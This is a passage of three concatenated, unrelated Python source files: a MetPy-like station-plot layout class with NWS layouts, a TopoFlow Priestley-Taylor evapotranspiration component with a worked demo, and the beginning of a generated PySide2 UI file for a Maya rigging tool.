a wind barb at the center of the station plot. If `units` are given, both
components will be converted to these units.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or line width.
Parameters
----------
u_name : str
The name of the parameter for the u-component for `barbs`, which is used as
a key to pull data out of the data container passed to :meth:`plot`.
v_name : str
The name of the parameter for the v-component for `barbs`, which is used as
a key to pull data out of the data container passed to :meth:`plot`.
units : pint-compatible unit, optional
The units to use for plotting. Data will be converted to this unit before
conversion to a string. If not specified, no conversion is done.
kwargs
Additional keyword arguments to use for matplotlib's
:meth:`~matplotlib.axes.Axes.barbs` function.
See Also
--------
add_symbol, add_text, add_value
"""
# Not sure if putting the v_name as a plot-specific option is appropriate,
# but it seems simpler than making name code in plot handle tuples
self['barb'] = (self.PlotTypes.barb, (u_name, v_name), (units, kwargs))
def names(self):
"""Get the list of names used by the layout.
Returns
-------
list[str]
the list of names of variables used by the layout
"""
ret = []
for item in self.values():
if item[0] == self.PlotTypes.barb:
ret.extend(item[1])
else:
ret.append(item[1])
return ret
def plot(self, plotter, data_dict):
"""Plot a collection of data using this layout for a station plot.
This function iterates through the entire specified layout, pulling the fields named
in the layout from `data_dict` and plotting them using `plotter` as specified
in the layout. Fields present in the layout, but not in `data_dict`, are ignored.
Parameters
----------
plotter : StationPlot
:class:`StationPlot` to use to plot the data. This controls the axes,
spacing, station locations, etc.
data_dict : dict[str, array-like]
Data container that maps a name to an array of data. Data from this object
will be used to fill out the station plot.
"""
def coerce_data(dat, u):
try:
return dat.to(u).magnitude
except AttributeError:
return dat
for loc, info in self.items():
typ, name, args = info
if typ == self.PlotTypes.barb:
# Try getting the data
u_name, v_name = name
u_data = data_dict.get(u_name)
v_data = data_dict.get(v_name)
# Plot if we have the data
if not (v_data is None or u_data is None):
units, kwargs = args
plotter.plot_barb(coerce_data(u_data, units), coerce_data(v_data, units),
**kwargs)
else:
# Check that we have the data for this location
data = data_dict.get(name)
if data is not None:
# If we have it, hand it to the appropriate method
if typ == self.PlotTypes.value:
fmt, units, kwargs = args
plotter.plot_parameter(loc, coerce_data(data, units), fmt, **kwargs)
elif typ == self.PlotTypes.symbol:
mapper, kwargs = args
plotter.plot_symbol(loc, data, mapper, **kwargs)
elif typ == self.PlotTypes.text:
plotter.plot_text(loc, data, **args)
def __repr__(self):
"""Return string representation of layout."""
return ('{'
+ ', '.join('{0}: ({1[0].name}, {1[1]}, ...)'.format(loc, info)
for loc, info in sorted(self.items(), key=lambda i: str(i[0])))  # stringify keys so str and tuple locations sort together
+ '}')
with exporter:
#: :desc: Simple station plot layout
simple_layout = StationPlotLayout()
simple_layout.add_barb('eastward_wind', 'northward_wind', 'knots')
simple_layout.add_value('NW', 'air_temperature', units='degC')
simple_layout.add_value('SW', 'dew_point_temperature', units='degC')
simple_layout.add_value('NE', 'air_pressure_at_sea_level', units='mbar',
fmt=lambda v: format(10 * v, '03.0f')[-3:])
simple_layout.add_symbol('C', 'cloud_coverage', sky_cover)
simple_layout.add_symbol('W', 'present_weather', current_weather)
#: Full NWS station plot `layout`__
#:
#: __ http://oceanservice.noaa.gov/education/yos/resource/JetStream/synoptic/wxmaps.htm
nws_layout = StationPlotLayout()
nws_layout.add_value((-1, 1), 'air_temperature', units='degF')
nws_layout.add_symbol((0, 2), 'high_cloud_type', high_clouds)
nws_layout.add_symbol((0, 1), 'medium_cloud_type', mid_clouds)
nws_layout.add_symbol((0, -1), 'low_cloud_type', low_clouds)
nws_layout.add_value((1, 1), 'air_pressure_at_sea_level', units='mbar',
fmt=lambda v: format(10 * v, '03.0f')[-3:])
nws_layout.add_value((-2, 0), 'visibility_in_air', fmt='.0f', units='miles')
nws_layout.add_symbol((-1, 0), 'present_weather', current_weather)
nws_layout.add_symbol((0, 0), 'cloud_coverage', sky_cover)
nws_layout.add_value((1, 0), 'tendency_of_air_pressure', units='mbar',
fmt=lambda v: ('-' if v < 0 else '') + format(10 * abs(v), '02.0f'))
nws_layout.add_symbol((2, 0), 'tendency_of_air_pressure_symbol', pressure_tendency)
nws_layout.add_barb('eastward_wind', 'northward_wind', units='knots')
nws_layout.add_value((-1, -1), 'dew_point_temperature', units='degF')
# TODO: Fix once we have the past weather symbols converted
nws_layout.add_symbol((1, -1), 'past_weather', current_weather)
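# --- Illustrative usage sketch (not part of the MetPy API) -------------------
# A small demo helper added here for illustration only: it draws a single
# made-up station model on a plain matplotlib Axes using the class above.
# Assumes this module is imported through the metpy.plots package so that the
# Axes.scattertext method used by plot_text() is registered.
def _demo_station_plot():
    """Draw one made-up station model and show the figure."""
    import matplotlib.pyplot as plt
    fig, ax = plt.subplots(figsize=(3, 3))
    ax.set_xlim(0, 1)
    ax.set_ylim(0, 1)
    demo = StationPlot(ax, [0.5], [0.5], fontsize=14)
    demo.plot_parameter('NW', [21.5], color='red')        # temperature [degC]
    demo.plot_parameter('SW', [15.0], color='darkgreen')  # dewpoint [degC]
    demo.plot_symbol('C', [3], sky_cover)                 # sky cover code 3
    demo.plot_barb([5.0], [10.0])                         # u, v wind components
    plt.show()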
|
|
#
# NB! See note at "THIS MAY BE COSTLY"
#-------------------------------------------
#
# Copyright (c) 2001-2014, Scott D. Peckham
#
# Sep 2014. New standard names and BMI updates and testing.
# Aug 2014. Updates to standard names and BMI.
# Wrote latent_heat_of_evaporation(); not used yet.
# Moved update_water_balance() to satzone_base.py.
# Nov 2013. Converted TopoFlow to Python package.
# Feb 2013. Adapted to use EMELI framework.
# Jan 2013. Revised handling of input/output names.
# Oct 2012. CSDMS Standard Names and BMI.
# May 2010. Changes to initialize() and read_cfg_file().
# Aug 2009. Updates.
# Jul 2009. Updates.
# May 2009. Updates.
# Apr 2009. Updates.
# Jan 2009. Converted from IDL to Python with I2PY.
#
#-----------------------------------------------------------------------
# NOTES: This file defines a Priestley-Taylor ET component
# and related functions. It inherits from the ET
# "base class" in "evap_base.py".
#-----------------------------------------------------------------------
#
# class evap_component
#
# get_attribute() # (10/26/11)
# get_input_var_names() # (5/15/12)
# get_output_var_names() # (5/15/12)
# get_var_name() # (5/16/12), Bolton
# get_var_units() # (5/16/12), Bolton
# ------------------------
# check_input_types()
# update_ET_rate()
# ------------------------
# open_input_files()
# read_input_files()
# close_input_files()
#
# Functions:
# Priestley_Taylor_ET_Rate
#
#-----------------------------------------------------------------------
import numpy as np
import os
from topoflow.components import evap_base
from topoflow.utils import model_input
#-----------------------------------------------------------------------
class evap_component( evap_base.evap_component ):
#-------------------------------------------------------------------
_att_map = {
'model_name': 'TopoFlow_Evaporation_Priestley_Taylor',
'version': '3.1',
'author_name': 'Scott D. Peckham',
'grid_type': 'uniform',
'time_step_type': 'fixed',
'step_method': 'explicit',
#------------------------------------------------------
'comp_name': 'EvapPriestleyTaylor',
'model_family': 'TopoFlow',
'cfg_template_file': 'Evap_Priestley_Taylor.cfg.in',
'cfg_extension': '_evap_priestley_taylor.cfg',
'cmt_var_prefix': '/EvapPriestleyTaylor/Input/Var/',
'gui_xml_file': '/home/csdms/cca/topoflow/3.1/src/share/cmt/gui/Evap_Priestley_Taylor.xml',
'dialog_title': 'Evaporation: Priestley-Taylor Parameters',
'time_units': 'seconds' }
#----------------------------------------------------------------
# Note that the "meteorology" component uses the following to
# compute Q_sum and Qe, but they aren't needed directly here:
# uz, z, z0_air, rho_air, Cp_air, Qn_SW, Qn_LW
#----------------------------------------------------------------
_input_var_names = [
'atmosphere_bottom_air__temperature', # (meteorology)
'land_surface_net-longwave-radiation__energy_flux', # (meteorology)
'land_surface_net-shortwave-radiation__energy_flux', # (meteorology)
'land_surface__temperature' ] # (meteorology)
#----------------------------------------------
# These are no longer needed here. (9/25/14)
#----------------------------------------------
# 'channel_water_x-section__mean_depth', # (@channels)
# 'soil_top-layer__porosity', # (@satzone)
# 'soil_top-layer__saturated_thickness', # (@satzone)
# 'soil_water_sat-zone_top_surface__elevation' ] # (@satzone)
#-------------------------------------------------
# These are currently obtained from the GUI/file
# and are not obtained from other components.
#-------------------------------------------------
## 'land_surface__elevation', # (GUI, DEM)
## 'land_surface_water__priestley-taylor_alpha_coefficient' # (GUI, alpha)
## 'soil__reference_depth_temperature', # (GUI, T_soil_x)
## 'soil_surface__temperature', # (GUI, T_surf)
## 'soil__temperature_reference_depth', # (GUI, soil_x)
## 'soil__thermal_conductivity' : # (GUI, K_soil)
#----------------------------------------------------
# These could be added in the future; not used yet.
#----------------------------------------------------
## 'soil_model_top_layer__saturated_water_content', # (satzone comp)
## 'land_surface_water_potential_evaporation_rate':'PET' }
_output_var_names = [
'land_surface_soil__conduction_heat_flux', # (Qc)
'land_surface_water__domain_time_integral_of_evaporation_volume_flux', # (vol_ET)
'land_surface_water__evaporation_volume_flux', # (ET)
'model__time_step' ] # (dt)
#-----------------------------------------------------
# These are read from GUI/file, but can be returned.
#-----------------------------------------------------
#'land_surface__elevation',
#'land_surface_water__priestley-taylor_alpha_coefficient',
#'soil__reference_depth_temperature',
## 'soil_surface__temperature',
#'soil__temperature_reference_depth',
#'soil__thermal_conductivity' ]
#----------------------------------------------------------------
# Should we use "ponded_water__depth" or "surface_water__depth"
# instead of "channel_water__depth" in this case ?
#----------------------------------------------------------------
# Should we use "soil_surface__temperature" or
# "land_surface__temperature" here ? (Both, for now.)
#----------------------------------------------------------------
_var_name_map = {
'atmosphere_bottom_air__temperature' : 'T_air',
'land_surface__temperature': 'T_surf',
'land_surface_net-longwave-radiation__energy_flux': 'Qn_LW',
'land_surface_net-shortwave-radiation__energy_flux': 'Qn_SW',
#---------------------------------------------------------------
'land_surface_soil__conduction_heat_flux' : 'Qc', # (computed)
'land_surface_water__domain_time_integral_of_evaporation_volume_flux': 'vol_ET',
'land_surface_water__evaporation_volume_flux' : 'ET',
'model__time_step': 'dt',
#-----------------------------------------------------
# These are read from GUI/file, but can be returned.
#-----------------------------------------------------
'land_surface__elevation' : 'DEM',
'land_surface_water__priestley-taylor_alpha_coefficient': 'alpha',
'soil__reference_depth_temperature' : 'T_soil_x',
# 'soil_surface__temperature' : 'T_surf', # (from met)
'soil__temperature_reference_depth': 'soil_x',
'soil__thermal_conductivity' : 'K_soil' } # (thermal !)
#----------------------------------------------
# These are no longer needed here. (9/25/14)
#----------------------------------------------
# 'channel_water_x-section__mean_depth' : 'depth',
# 'soil_top-layer__porosity': 'p0',
# 'soil_top-layer__saturated_thickness' : 'y0',
# 'soil_water_sat-zone_top_surface__elevation' : 'h_table' }
#------------------------------------------------
# What is the correct unit string for "deg_C" ?
#------------------------------------------------
_var_units_map = {
'atmosphere_bottom_air__temperature' : 'deg_C',
'land_surface__temperature': 'deg_C',
'land_surface_net-longwave-radiation__energy_flux': 'W m-2',
'land_surface_net-shortwave-radiation__energy_flux': 'W m-2',
#--------------------------------------------------------------
'land_surface_soil__conduction_heat_flux' : 'W m-2',
'land_surface_water__evaporation_volume_flux' : 'm s-1',
'land_surface_water__domain_time_integral_of_evaporation_volume_flux': 'm3',
'model__time_step' : 's',
#-----------------------------------------------------
# These are read from GUI/file, but can be returned.
#-----------------------------------------------------
'land_surface__elevation' : 'm',
'land_surface_water__priestley-taylor_alpha_coefficient': '1',
'soil__reference_depth_temperature' : 'deg_C',
# 'soil_surface__temperature' : 'deg_C',
'soil__temperature_reference_depth': 'm',
'soil__thermal_conductivity' : 'W m-1 K-1' }
#----------------------------------------------
# These are no longer needed here. (9/25/14)
#----------------------------------------------
# 'channel_water_x-section__mean_depth' : 'm',
# 'soil_top-layer__porosity': '1',
# 'soil_top-layer__saturated_thickness' : 'm',
# 'soil_water_sat-zone_top_surface__elevation' : 'm' }
#------------------------------------------------
# Return NumPy string arrays vs. Python lists ?
#------------------------------------------------
## _input_var_names = np.array( _input_var_names )
## _output_var_names = np.array( _output_var_names )
#-------------------------------------------------------------------
def get_attribute(self, att_name):
try:
return self._att_map[ att_name.lower() ]
except KeyError:
print('###################################################')
print(' ERROR: Could not find attribute: ' + att_name)
print('###################################################')
print(' ')
# get_attribute()
#-------------------------------------------------------------------
def get_input_var_names(self):
#--------------------------------------------------------
# Note: These are currently variables needed from other
# components vs. those read from files or GUI.
#--------------------------------------------------------
return self._input_var_names
# get_input_var_names()
#-------------------------------------------------------------------
def get_output_var_names(self):
return self._output_var_names
# get_output_var_names()
#-------------------------------------------------------------------
def get_var_name(self, long_var_name):
return self._var_name_map[ long_var_name ]
# get_var_name()
#-------------------------------------------------------------------
def get_var_units(self, long_var_name):
return self._var_units_map[ long_var_name ]
# get_var_units()
#-------------------------------------------------------------------
## def get_var_type(self, long_var_name):
##
## #---------------------------------------
## # So far, all vars have type "double",
## # but use the one in BMI_base instead.
## #---------------------------------------
## return 'float64'
##
## # get_var_type()
#-------------------------------------------------------------------
def check_input_types(self):
#--------------------------------------------------------
# As of 7/9/10, Qn_SW and Qn_LW are computed internally
# from other vars, including slope and aspect grids.
# So they'll always be grids and so will self.ET
# unless PRECIP_ONLY = True.
#--------------------------------------------------------
are_scalars = np.array([
self.is_scalar('T_soil_x'),
self.is_scalar('soil_x'),
self.is_scalar('K_soil'),
self.is_scalar('alpha'),
#-------------------------------
self.is_scalar('ET'), # @evap
self.is_scalar('Qn_SW'), # @met
self.is_scalar('Qn_LW'), # @met
self.is_scalar('T_air'), # @met
self.is_scalar('T_surf') ]) # @met
#---------------------------------
# self.is_scalar('depth'), # d@chan
# self.is_scalar('h_table') ]) # satzone
#-------------------------------
## Qn_SW_IS_SCALAR,
## Qn_LW_IS_SCALAR,
## self.is_scalar('T_air'),
## self.is_scalar('T_surf') ])
self.ALL_SCALARS = np.all(are_scalars)
## self.ALL_SCALARS = False
# check_input_types()
#-------------------------------------------------------------------
def update_ET_rate(self):
#--------------------------------------------------------------
# Notes: Qet = energy used for ET of water from surface
# Qn_SW = net shortwave irradiation flux (solar)
# Qn_LW = net longwave irradiation flux (air, surface)
# Qh = sensible heat flux from turbulent convection
# between snow surface and air
# Qc = energy transferred from surface to subsurface
# All of the Q's have units of [W/m^2].
# T_air = air temperature [deg_C]
# T_surf = soil temp at the surface [deg_C]
# T_soil_x = soil temp at depth of x meters [deg_C]
# Ks = thermal conductivity of soil [W m-1 K-1]
# Ks = 0.45 ;[W m-1 K-1] (thawed soil; moisture content
# near field capacity)
# Ks = 1.0 ;[W m-1 K-1] (frozen soil)
# alpha = evaporation parameter
# alpha = 0.95 ;(average found by Rouse)
# alpha = 1.26 ;(Jackson et al. (1996), at saturation)
# Modification of alpha: alpha = (a1 * R) + a2
# R = 1.0d ;(equals 1 for saturation; R in [0,1])
# a1 = 1.0d ;(accounts for moisture content of soil)
# a2 = 0.2d ;(accounts for vegetation effect)
#--------------------------------------------------------------
Qn_SW = self.Qn_SW # (2/3/13, new framework)
Qn_LW = self.Qn_LW # (2/3/13, new framework)
T_air = self.T_air # (2/3/13, new framework)
T_surf = self.T_surf # (2/3/13, new framework)
Q_net = Qn_SW + Qn_LW
#---------------------------------------------
# Compute the conductive energy between the
# surface and subsurface using Fourier's law
#---------------------------------------------
# soil_x is converted from [cm] to [m] when
# it is read from the GUI and then stored
#---------------------------------------------
# In Qet formula, the constant 0.011 has
# units of 1/[deg_C] to cancel T_air units.
#---------------------------------------------
Qc = self.K_soil * (self.T_soil_x - T_surf) / self.soil_x
Qet = self.alpha * (np.float64(0.406) + (np.float64(0.011) * T_air)) * (Q_net - Qc)
self.Qc = Qc ## (2/3/13)
#-----------------------------------
# Convert ET energy to a loss rate
#------------------------------------------
# Lf = latent heat of fusion [J/kg]
# Lv = latent heat of vaporization [J/kg]
# ET = (Qet / (rho_w * Lv))
#------------------------------------------
# rho_w = 1000d ;[kg/m^3]
# Lv = -2500000d ;[J/kg]
# So (rho_w * Lv) = -2.5e+9 [J/m^3]
#-------------------------------------
ET = (Qet / np.float64(2.5E+9)) #[m/s] (A loss, but returned as positive.)
self.ET = np.maximum(ET, np.float64(0))
##########################################
# THIS MAY BE COSTLY. BETTER WAY OR
# ALLOW ET TO BE A SCALAR ??
##########################################
if (np.size(self.ET) == 1):
self.ET += np.zeros((self.ny, self.nx), dtype='float64')
# update_ET_rate()
#-------------------------------------------------------------------
def open_input_files(self):
#----------------------------------------------------
# Note: Priestley-Taylor method needs alpha but the
# energy balance method doesn't. (2/5/13)
#----------------------------------------------------
self.alpha_file = self.in_directory + self.alpha_file
self.K_soil_file = self.in_directory + self.K_soil_file
self.soil_x_file = self.in_directory + self.soil_x_file
self.T_soil_x_file = self.in_directory + self.T_soil_x_file
self.alpha_unit = model_input.open_file(self.alpha_type, self.alpha_file)
self.K_soil_unit = model_input.open_file(self.K_soil_type, self.K_soil_file)
self.soil_x_unit = model_input.open_file(self.soil_x_type, self.soil_x_file)
self.T_soil_x_unit = model_input.open_file(self.T_soil_x_type, self.T_soil_x_file)
# open_input_files()
#-------------------------------------------------------------------
def read_input_files(self):
rti = self.rti
#-------------------------------------------------------
# All grids are assumed to have a data type of Float32.
#-------------------------------------------------------
alpha = model_input.read_next(self.alpha_unit, self.alpha_type, rti)
if (alpha is not None): self.alpha = alpha
K_soil = model_input.read_next(self.K_soil_unit, self.K_soil_type, rti)
if (K_soil is not None): self.K_soil = K_soil
soil_x = model_input.read_next(self.soil_x_unit, self.soil_x_type, rti)
if (soil_x is not None): self.soil_x = soil_x
T_soil_x = model_input.read_next(self.T_soil_x_unit, self.T_soil_x_type, rti)
if (T_soil_x is not None): self.T_soil_x = T_soil_x
# read_input_files()
#-------------------------------------------------------------------
def close_input_files(self):
if (self.alpha_type != 'Scalar'): self.alpha_unit.close()
if (self.K_soil_type != 'Scalar'): self.K_soil_unit.close()
if (self.soil_x_type != 'Scalar'): self.soil_x_unit.close()
if (self.T_soil_x_type != 'Scalar'): self.T_soil_x_unit.close()
## if (self.alpha_file != ''): self.alpha_unit.close()
## if (self.K_soil_file != ''): self.K_soil_unit.close()
## if (self.soil_x_file != ''): self.soil_x_unit.close()
## if (self.T_soil_x_file != ''): self.T_soil_x_unit.close()
# close_input_files()
#-------------------------------------------------------------------
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
def Priestley_Taylor_ET_Rate(alpha, Ks, T_soil_x, soil_x, \
Qn_SW, Qn_LW, T_air, T_surf):
#--------------------------------------------------------------
# Notes: Qet = energy used for ET of water from surface
# Qn_SW = net shortwave radiation flux (solar)
# Qn_LW = net longwave radiation flux (air, surface)
# Qh = sensible heat flux from turbulent convection
# between snow surface and air
# Qc = energy transferred from surface to subsurface
# All of the Q's have units of [W/m^2].
# T_air = air temperature [deg_C]
# T_surf = soil temp at the surface [deg_C]
# T_soil_x = soil temp at depth of x meters [deg_C]
# Ks = thermal conductivity of soil [W m-1 K-1]
# Ks = 0.45 ;[W m-1 K-1] (thawed soil; moisture content
# near field capacity)
# Ks = 1.0 ;[W m-1 K-1] (frozen soil)
# alpha = evaporation parameter
# alpha = 0.95 ;(average found by Rouse)
# alpha = 1.26 ;(Jackson et al. (1996), at saturation)
# Modification of alpha: alpha = (a1 * R) + a2
# R = 1.0d ;(equals 1 for saturation; R in [0,1])
# a1 = 1.0d ;(accounts for moisture content of soil)
# a2 = 0.2d ;(accounts for vegetation effect)
#--------------------------------------------------------------
#---------------------------------------------
# Compute the conductive energy between the
# surface and subsurface using Fourier's law
#---------------------------------------------
# soil_x is converted from [cm] to [m] when
# it is read from the GUI and then stored
#---------------------------------------------
# In Qet formula, the constant 0.011 has
# units of 1/[deg_C] to cancel T_air units.
#---------------------------------------------
Qc = Ks * (T_soil_x - T_surf) / (soil_x)
Qnet = Qn_SW + Qn_LW
Qet = alpha * (np.float64(0.406) + (np.float32(0.011) * T_air)) * (Qnet - Qc)
#-----------------------------------
# Convert ET energy to a loss rate
#------------------------------------------
# Lf = latent heat of fusion [J/kg]
# Lv = latent heat of vaporization [J/kg]
# ET = (Qet / (rho_w * Lv))
#------------------------------------------
# rho_w = 1000d ;[kg/m^3]
# Lv = -2500000d ;[J/kg]
# So (rho_w * Lv) = -2.5e+9 [J/m^3]
#-------------------------------------
ET = (Qet / np.float32(2.5E+9)) #[m/s] (A loss, but returned as positive.)
return np.maximum(ET, np.float64(0))
# Priestley_Taylor_ET_Rate
#-----------------------------------------------------------------------
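#-----------------------------------------------------------------------
# Illustrative check (not part of the component): one call to
# Priestley_Taylor_ET_Rate() with round-number scalar inputs. The values
# below are made up for demonstration and are not from a TopoFlow test.
#-----------------------------------------------------------------------
def _demo_priestley_taylor_rate():
    ET = Priestley_Taylor_ET_Rate(
        alpha=np.float64(1.26),      # Jackson et al. (1996), at saturation
        Ks=np.float64(0.45),         # thawed soil [W m-1 K-1]
        T_soil_x=np.float64(12.0),   # soil temp at depth x [deg_C]
        soil_x=np.float64(0.1),      # reference depth x [m]
        Qn_SW=np.float64(200.0),     # net shortwave flux [W m-2]
        Qn_LW=np.float64(-50.0),     # net longwave flux [W m-2]
        T_air=np.float64(15.0),      # air temperature [deg_C]
        T_surf=np.float64(14.0))     # surface temperature [deg_C]
    #------------------------------------------------------------
    # Qc = 0.45 * (12 - 14) / 0.1 = -9 W m-2, Qnet = 150 W m-2,
    # Qet ~ 114 W m-2, so ET ~ 4.6e-8 m s-1 (about 4 mm per day).
    #------------------------------------------------------------
    print('ET rate =', ET, '[m s-1]')
# _demo_priestley_taylor_rate()
#-----------------------------------------------------------------------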
|
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'G://Projects/_tools/_maya/fossil\pdil\tool\fossil/ui/rigToolUI.ui',
# licensing of 'G://Projects/_tools/_maya/fossil\pdil\tool\fossil/ui/rigToolUI.ui' applies.
#
# Created: Tue Jul 13 00:37:35 2021
# by: pyside2-uic running on PySide2 5.12.5
#
# WARNING! All changes made in this file will be lost!
from QT_PDIL_vendored import QtCompat, QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(991, 1050)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName("horizontalLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.tabWidget.addTab(self.tab, "")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.tab_3)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.splitter_2 = QtWidgets.QSplitter(self.tab_3)
self.splitter_2.setOrientation(QtCore.Qt.Horizontal)
self.splitter_2.setObjectName("splitter_2")
self.widget = QtWidgets.QWidget(self.splitter_2)
self.widget.setObjectName("widget")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget)
self.verticalLayout_3.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.splitter = QtWidgets.QSplitter(self.widget)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.widget_4 = QtWidgets.QWidget(self.splitter)
self.widget_4.setObjectName("widget_4")
self.verticalLayout = QtWidgets.QVBoxLayout(self.widget_4)
self.verticalLayout.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setContentsMargins(-1, -1, -1, 3)
self.gridLayout.setObjectName("gridLayout")
self.jointCount = QtWidgets.QSpinBox(self.widget_4)
self.jointCount.setMinimum(1)
self.jointCount.setObjectName("jointCount")
self.gridLayout.addWidget(self.jointCount, 0, 0, 1, 1)
self.buildBonesBtn = QtWidgets.QPushButton(self.widget_4)
self.buildBonesBtn.setObjectName("buildBonesBtn")
self.gridLayout.addWidget(self.buildBonesBtn, 1, 1, 1, 1)
self.buildRigBtn = QtWidgets.QPushButton(self.widget_4)
self.buildRigBtn.setObjectName("buildRigBtn")
self.gridLayout.addWidget(self.buildRigBtn, 1, 2, 1, 1)
self.cardJointNames = QtWidgets.QLineEdit(self.widget_4)
self.cardJointNames.setObjectName("cardJointNames")
self.gridLayout.addWidget(self.cardJointNames, 0, 1, 1, 2)
self.selectAllBtn = QtWidgets.QPushButton(self.widget_4)
self.selectAllBtn.setObjectName("selectAllBtn")
self.gridLayout.addWidget(self.selectAllBtn, 1, 0, 1, 1)
self.deleteRigBtn = QtWidgets.QPushButton(self.widget_4)
self.deleteRigBtn.setObjectName("deleteRigBtn")
self.gridLayout.addWidget(self.deleteRigBtn, 2, 2, 1, 1)
self.deleteBonesBtn = QtWidgets.QPushButton(self.widget_4)
self.deleteBonesBtn.setObjectName("deleteBonesBtn")
self.gridLayout.addWidget(self.deleteBonesBtn, 2, 1, 1, 1)
self.saveModsBtn = QtWidgets.QPushButton(self.widget_4)
self.saveModsBtn.setObjectName("saveModsBtn")
self.gridLayout.addWidget(self.saveModsBtn, 1, 3, 1, 1)
self.restoreModsBtn = QtWidgets.QPushButton(self.widget_4)
self.restoreModsBtn.setObjectName("restoreModsBtn")
self.gridLayout.addWidget(self.restoreModsBtn, 2, 3, 1, 1)
self.label_15 = QtWidgets.QLabel(self.widget_4)
self.label_15.setText("")
self.label_15.setObjectName("label_15")
self.gridLayout.addWidget(self.label_15, 1, 4, 1, 1)
self.makeCardBtn = QtWidgets.QPushButton(self.widget_4)
self.makeCardBtn.setObjectName("makeCardBtn")
self.gridLayout.addWidget(self.makeCardBtn, 0, 5, 1, 1)
self.rebuildProxyBtn = QtWidgets.QPushButton(self.widget_4)
self.rebuildProxyBtn.setObjectName("rebuildProxyBtn")
self.gridLayout.addWidget(self.rebuildProxyBtn, 0, 6, 1, 1)
self.horizontalLayout_6.addLayout(self.gridLayout)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.restoreContainer = QtWidgets.QWidget(self.widget_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.restoreContainer.sizePolicy().hasHeightForWidth())
self.restoreContainer.setSizePolicy(sizePolicy)
self.restoreContainer.setMinimumSize(QtCore.QSize(30, 0))
self.restoreContainer.setObjectName("restoreContainer")
self.horizontalLayout_13 = QtWidgets.QHBoxLayout(self.restoreContainer)
self.horizontalLayout_13.setSpacing(0)
self.horizontalLayout_13.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.layout = QtWidgets.QGridLayout()
self.layout.setContentsMargins(-1, -1, -1, 3)
self.layout.setObjectName("layout")
self.constraintsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.constraintsRestore.setObjectName("constraintsRestore")
self.layout.addWidget(self.constraintsRestore, 0, 2, 1, 1)
self.lockedAttrsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.lockedAttrsRestore.setObjectName("lockedAttrsRestore")
self.layout.addWidget(self.lockedAttrsRestore, 1, 2, 1, 1)
self.spacesRestore = QtWidgets.QPushButton(self.restoreContainer)
self.spacesRestore.setObjectName("spacesRestore")
self.layout.addWidget(self.spacesRestore, 0, 0, 1, 1)
self.pushButton_3 = QtWidgets.QPushButton(self.restoreContainer)
self.pushButton_3.setObjectName("pushButton_3")
self.layout.addWidget(self.pushButton_3, 3, 0, 1, 1)
self.visGroupRestore = QtWidgets.QPushButton(self.restoreContainer)
self.visGroupRestore.setObjectName("visGroupRestore")
self.layout.addWidget(self.visGroupRestore, 1, 0, 1, 1)
self.connectionsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.connectionsRestore.setObjectName("connectionsRestore")
self.layout.addWidget(self.connectionsRestore, 0, 1, 1, 1)
self.setDrivenRestore = QtWidgets.QPushButton(self.restoreContainer)
self.setDrivenRestore.setObjectName("setDrivenRestore")
self.layout.addWidget(self.setDrivenRestore, 1, 1, 1, 1)
self.customAttrsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.customAttrsRestore.setObjectName("customAttrsRestore")
self.layout.addWidget(self.customAttrsRestore, 3, 1, 1, 1)
self.horizontalLayout_13.addLayout(self.layout)
self.horizontalLayout_6.addWidget(self.restoreContainer)
self.verticalLayout.addLayout(self.horizontalLayout_6)
self.cardLister = CardLister(self.widget_4)
self.cardLister.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.cardLister.setObjectName("cardLister")
self.cardLister.header().setStretchLastSection(False)
self.verticalLayout.addWidget(self.cardLister)
self.widget_5 = QtWidgets.QWidget(self.splitter)
self.widget_5.setObjectName("widget_5")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_5)
self.verticalLayout_2.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setContentsMargins(-1, 0, -1, -1)
self.gridLayout_2.setObjectName("gridLayout_2")
